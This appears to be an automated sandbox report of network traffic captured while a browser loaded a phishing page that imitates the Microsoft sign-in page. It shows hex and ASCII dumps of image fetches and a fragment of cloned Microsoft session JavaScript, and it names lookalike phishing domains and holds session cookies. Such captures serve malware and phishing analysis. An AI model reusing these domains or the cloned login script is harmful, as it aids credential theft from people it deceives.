                                                                                                                              2024-10-04 13:11:14 UTC2469INData Raw: 15 78 3c 32 d3 c9 17 b6 63 68 f2 5e 3e ca 38 c7 fa da b4 a6 b7 c9 4e e7 6b eb eb 52 5a e4 a3 63 e0 52 22 d0 e9 eb e5 b4 39 64 8c cb 89 81 6f d5 ca 69 80 28 8f c7 e5 c4 31 24 e6 e5 c4 29 24 a6 e5 c4 89 0f 04 77 29 6d e6 03 81 5d 4a 1b f9 40 80 97 d2 6e 7c 20 c6 4b 69 97 3e 50 1b a5 b4 73 1f 48 9c 52 da 85 0f a4 51 29 ed cc b7 9e 94 d3 ae d0 e1 5d 29 ed da b7 be 2d a7 1d c9 68 79 e3 e3 b4 66 7d f1 b5 ed ac f7 28 1c df ed 02 dd 2b ec 9b 9f eb f4 dd eb 7d 2b 33 dc 1d af db 7d ff f8 89 03 39 df f8 eb ad c1 71 0a 93 ff b5 bd 0e 9f d7 dd 17 14 4f 10 e3 02 ae 47 0f d8 5e 7f 74 4f dd e7 ee a1 fb d6 fd d5 7d e5 be 73 0f 7e 87 46 f4 ed c2 7d 89 4a 7c 59 a6 83 dc bb ef fd 83 56 74 1e 03 cf f7 82 63 43 7f e7 bf 94 24 d3 33 bf ed be 46 3e eb 7b 14 3a 2b 1d a6 4f fa be
                                                                                                                              Data Ascii: x<2ch^>8NkRZcR"9doi(1$)$w)m]J@n| Ki>PsHRQ)])-hyf}(+}+3}9qOG^tO}s~F}J|YVtcC$3F>{:+O


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              53192.168.2.174982913.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:14 UTC672OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:14 UTC740INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:14 GMT
                                                                                                                              Content-Type: image/gif
                                                                                                                              Content-Length: 2672
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:47 GMT
                                                                                                                              ETag: 0x8DB5C3F48EC4154
                                                                                                                              x-ms-request-id: 9f37b09b-401e-0072-2bf1-0fb3a6000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131114Z-15767c5fc55jdxmppy6cmd24bn00000004rg00000000ggbb
                                                                                                                              x-fd-int-roxy-purgeid: 4554691
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:14 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                                                                                              Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              54192.168.2.174982813.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:14 UTC666OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:14 UTC734INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:14 GMT
                                                                                                                              Content-Type: image/gif
                                                                                                                              Content-Length: 3620
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                              ETag: 0x8DB5C3F4904824B
                                                                                                                              x-ms-request-id: e982a800-401e-007a-2a28-15de16000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131114Z-15767c5fc55n4msds84xh4z67w00000006c00000000000vx
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:14 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                                                                              Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              55192.168.2.174983013.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:14 UTC404OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:15 UTC738INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:15 GMT
                                                                                                                              Content-Type: image/x-icon
                                                                                                                              Content-Length: 17174
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Last-Modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                                                                                              ETag: 0x8D8731230C851A6
                                                                                                                              x-ms-request-id: b5d34ad9-001e-006b-6cbb-1344a2000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131115Z-15767c5fc55tsfp92w7yna557w0000000cp0000000004epc
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:15 UTC15646INData Raw: 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
                                                                                                                              Data Ascii: h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333333333
                                                                                                                              2024-10-04 13:11:15 UTC1528INData Raw: 28 00 00 00 20 00 00 00 40 00 00 00 01 00 04 00 00 00 00 00 80 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 bc 7b 00 1f 4c f9 00 22 50 f2 00 f7 a6 00 00 00 ba 7f 00 f3 a6 00 00 1e 4e f6 00 23 4e f4 00 f3 a4 00 00 00 bc 7d 00 00 ba 7d 00 00 00 00 00 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22 c0 03 33 33 33 33 33 33 33 22 22 22 22 22 22 22
                                                                                                                              Data Ascii: ( @{L"PN#N}}"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""3333333"""""""


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              56192.168.2.1749836172.67.71.1244432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:15 UTC1358OUTGET /Me.htm?v=3 HTTP/1.1
                                                                                                                              Host: ywnjb.ftlivedocs.tech
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Upgrade-Insecure-Requests: 1
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Sec-Fetch-Site: same-site
                                                                                                                              Sec-Fetch-Mode: navigate
                                                                                                                              Sec-Fetch-Dest: iframe
                                                                                                                              Referer: https://l0gin-microso.ftlivedocs.tech/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Cookie: fNYe=896a8296dd752621a31badfb843ea3b9d58cbc46d6504a1582b16c1633cbccb4; cf_clearance=PnrrDIdUFnV3xXNKwU7Uk2KkvZUrRmLQ6VsqVSFs7iI-1728047462-1.2.1.1-KgyGMoX2WsyMGE_crV0QHN0PnWPTTT_vkrnfk6OUsXs.ZCFyIMeIhyPM5AaovJKdYX33b6XhxSMauVLxhud15UDF6qe_lUUn4z7DUAUZgquXnur2JBrKraoo31FHgtIWsUITRVzxmgHzvH3L3sRtyyvkXX55rBaE6wwFcRgFWsHKcOzBUkmtg.SYM871TLywvjL.S9lBf6XKCP1RA_4rE_E8nRcZe7.uq6YsjbK5vOgE7JsW9ukyLOepD1wU8T7pQ7FQYb9ZLbSWuiaz05fetoXoB9g1me566IfE.8W3ydmURQRK0le68jWlAR9ChGQtId1KGEdKLtkgMNrP.DUbgel24XyilarY80urzfUxbGWeV87XlXGmDq1MBeocoMX5; MUID=0572C4040C3160E33E86D10A0D3661F9; uaid=12fc96651938487da1bcb76e2727bac5; MSPRequ=id=N&lt=1728047473&co=1
                                                                                                                              2024-10-04 13:11:15 UTC1107INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:15 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: max-age=315360000
                                                                                                                              Expires: Mon, 02 Oct 2034 13:11:15 GMT
                                                                                                                              P3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                              Ppserver: PPV: 30 H: PH1PEPF00011F98 V: 0
                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                              Set-Cookie: uaid=ee1eafc1445a479e9f76f4d9957064b5; Path=/; Domain=ywnjb.ftlivedocs.tech; HttpOnly; Secure; SameSite=None
                                                                                                                              Set-Cookie: MSPRequ=id=N&lt=1728047475&co=2; Path=/; Domain=ywnjb.ftlivedocs.tech; HttpOnly; Secure; SameSite=None
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              X-Ms-Request-Id: a95460ec-864b-4ebc-93e3-d2d7e5806a9f
                                                                                                                              X-Ms-Route-Info: C551_BAY
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6d9BhPFlXyJxI6%2FEHMfS%2BV5f7nbY48NgFzI%2FFRUxY9On3h5zlGlKaOCwUD85LUng16cOvAyRdvNNiX5rvlJ97Lp3DrNY4qRWVzAzK%2FNc89Qdg9SnB1xwKb4qDx9RG2fkOzaubU4Pbw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56ab14c7819d3-EWR
                                                                                                                              2024-10-04 13:11:15 UTC262INData Raw: 64 38 34 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 73 20 69 6e 20 65 29 74 5b 73 5d 3d 65 5b 73 5d 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 6e 29 7b 69 66 28 73 5b 6e 5d 29 72 65 74 75 72 6e 20 73 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 73 5b 6e 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 2c 69 64 3a 6e 2c 6c 6f 61 64 65 64 3a 21 31 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 65 29 2c 69 2e 6c 6f 61 64 65 64 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 76 61 72 20 73 3d 7b 7d 3b 72 65 74 75 72 6e 20
                                                                                                                              Data Ascii: d84<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return
                                                                                                                              2024-10-04 13:11:15 UTC1369INData Raw: 2e 63 3d 73 2c 65 2e 70 3d 22 22 2c 65 28 30 29 7d 28 5b 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 75 6e 63 74 69 6f 6e 20 73 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 66 5b 53 5d 2c 73 3d 30 2c 6e 3d 65 2e 6c 65 6e 67 74 68 3b 73 3c 6e 3b 2b 2b 73 29 69 66 28 65 5b 73 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 66 6f 72 28 76 61 72 20 65 3d 74 2b 22 3d 22 2c 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 2e 73 70 6c 69 74 28 22 3b 22 29 2c 6e 3d 30 2c 69 3d 73 2e 6c 65 6e 67 74 68 3b 6e 3c 69 3b 6e 2b 2b 29 7b 76 61 72 20 61 3d 73 5b 6e 5d 2e 72 65 70 6c 61 63 65 28 2f 5e 5c 73 2a 28 5c 77 2b 29 5c 73 2a 3d 5c 73 2a 2f 2c 22
                                                                                                                              Data Ascii: .c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"
                                                                                                                              2024-10-04 13:11:15 UTC1369INData Raw: 7b 76 61 72 20 6c 3d 7b 7d 3b 69 28 73 2c 53 2e 75 73 65 72 4c 69 73 74 2c 6c 29 2c 69 28 61 2c 53 2e 75 73 65 72 4c 69 73 74 2c 6c 29 2c 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 65 2e 75 73 65 4d 73 61 53 65 73 73 69 6f 6e 53 74 61 74 65 29 2c 65 2e 75 73 65 4d 73 61 53 65 73 73 69 6f 6e 53 74 61 74 65 3d 3d 3d 21 30 26 26 28 30 21 3d 53 2e 75 73 65 72 4c 69 73 74 2e 6c 65 6e 67 74 68 3f 28 53 2e 74 69 6c 65 73 53 74 61 74 65 2e 68 61 73 53 74 6f 72 61 67 65 41 63 63 65 73 73 3d 32 2c 53 2e 74 69 6c 65 73 53 74 61 74 65 2e 74 72 61 6e 73 69 65 6e 74 53 74 61 74 65 3d 73 2c 53 2e 74 69 6c 65 73 53 74 61 74 65 2e 70 65 72 73 69 73 74 65 6e 74 53 74 61 74 65 3d 61 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 2e 68 61 73
                                                                                                                              Data Ascii: {var l={};i(s,S.userList,l),i(a,S.userList,l),console.log(e.useMsaSessionState),e.useMsaSessionState===!0&&(0!=S.userList.length?(S.tilesState.hasStorageAccess=2,S.tilesState.transientState=s,S.tilesState.persistentState=a):"function"==typeof document.has
                                                                                                                              2024-10-04 13:11:15 UTC467INData Raw: 2e 63 6f 6d 22 2c 22 68 74 74 70 73 3a 2f 2f 64 65 76 69 63 65 2e 6c 30 67 69 6e 2d 6d 69 63 72 6f 73 6f 2e 66 74 6c 69 76 65 64 6f 63 73 2e 74 65 63 68 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 77 69 6e 64 6f 77 73 2d 70 70 65 2e 6e 65 74 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 77 69 6e 64 6f 77 73 2e 6e 65 74 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 64 65 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 70 61 72 74 6e 65 72 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e 63 6e 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 63 68 69 6e 61 63 6c 6f 75 64 61 70 69 2e 63 6e 22 2c 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 6d 69 63 72 6f 73 6f 66 74 6f 6e 6c 69 6e 65 2e
                                                                                                                              Data Ascii: .com","https://device.l0gin-microso.ftlivedocs.tech","https://login.windows-ppe.net","https://login.windows.net","https://login.microsoftonline.de","https://login.partner.microsoftonline.cn","https://login.chinacloudapi.cn","https://login.microsoftonline.
                                                                                                                              2024-10-04 13:11:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              57192.168.2.174983113.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:15 UTC417OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:15 UTC734INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:15 GMT
                                                                                                                              Content-Type: image/gif
                                                                                                                              Content-Length: 3620
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                              ETag: 0x8DB5C3F4904824B
                                                                                                                              x-ms-request-id: e982a800-401e-007a-2a28-15de16000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131115Z-15767c5fc554w2fgapsyvy8ua00000000c3g00000000abbp
                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                              X-Cache: TCP_HIT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              2024-10-04 13:11:15 UTC3620INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 0f
                                                                                                                              Data Ascii: GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`9


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              58192.168.2.174983313.107.246.454432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:15 UTC423OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                                                                              Host: aadcdn.msauth.net
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:15 UTC740INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:15 GMT
                                                                                                                              Content-Type: image/gif
                                                                                                                              Content-Length: 2672
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                              Last-Modified: Wed, 24 May 2023 10:11:47 GMT
                                                                                                                              ETag: 0x8DB5C3F48EC4154
                                                                                                                              x-ms-request-id: 48845bf4-101e-0022-5767-1571f6000000
                                                                                                                              x-ms-version: 2009-09-19
                                                                                                                              x-ms-lease-status: unlocked
                                                                                                                              x-ms-blob-type: BlockBlob
                                                                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                              x-azure-ref: 20241004T131115Z-15767c5fc55sdcjq8ksxt4n9mc00000001ug00000000h8vb
